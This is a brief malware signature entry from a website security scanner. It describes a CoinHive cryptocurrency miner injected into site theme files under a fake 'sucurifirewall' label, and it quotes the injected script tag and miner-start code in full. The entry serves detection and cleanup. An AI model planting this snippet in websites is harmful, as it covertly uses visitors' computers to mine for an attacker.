SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.cryptominer.5

malware.cryptominer.5

Description:
Website contains an injected CoinHive JavaScript miner library, which pretends to be related to sucurifirewall.

The script can be injected into header.php and footer.php of WordPress themes:

<scr ipt src="https://coinhive[.]com/lib/coinhive.​min.js"></script>
<script>
    var miner = new CoinHive​.User('​wMi7wDDFODxuLxV9S0M32EK0G9czsndP', 'sucurifirewall'); 
    miner​.start();
</script>

More information.

Affecting: Magento

Mitigation How to clean a hacked Magento site